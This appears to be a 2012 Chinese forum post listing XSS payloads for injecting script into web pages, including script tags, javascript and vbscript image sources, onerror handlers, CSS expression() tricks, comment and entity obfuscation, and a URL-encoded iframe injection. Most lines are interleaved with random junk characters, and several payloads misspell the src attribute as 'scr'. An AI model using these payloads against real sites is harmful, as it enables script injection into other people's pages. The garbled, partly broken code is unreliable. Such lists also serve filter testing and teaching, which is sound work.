<script>alert("跨站")</script> (最常用)' K, O! K' k" b$ n5 R
<img scr=javascript:alert("跨站")></img>
7 ~* d' Z1 ]& B. z<img scr="javascript: alert(/跨站/)></img>/ F5 g" W- t$ N$ [
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
/ ?9 i5 B, l/ B# Q( ?<img scr="#" onerror=alert(/跨站/)></img>
; d7 M, I. p5 K5 s) u<img scr="#" style="xss:expression(alert(/xss/));"></img>
- e; Y6 b4 x" _: o& N7 c<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
; i: ^) ~% N3 \& v& j Q<img src=vbscript:msgbox ("xss")></img>
# P5 j5 k o' m7 _& C, ?- w* s9 ^<style> input {left:expression (alert('xss'))}</style>
% e+ U- M+ W. s: m: J% M! ^8 _<div style={left:expression (alert('xss'))}></div>
1 U3 D2 ?! d {$ g: U. m<div style={left:exp/* */ression (alert('xss'))}></div>
$ E0 L& _. u1 X0 S) I% S<div style={left:\0065\0078ression (alert('xss'))}></div>
- z8 P* u- X$ ^5 i0 A: o0 ]6 @; qhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
, H& C5 w) S5 y. W, a3 j- t" @unicode <div style="{left:expRessioN (alert('xss'))}">: @0 F4 w* r- @/ }/ Z* N
+ u& E3 K0 v, u0 W# H6 l/ s
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
, t6 G6 k6 m4 f6 I) n+ i% | |
发表于 2012-9-15 14:09:13
收藏
支持
反对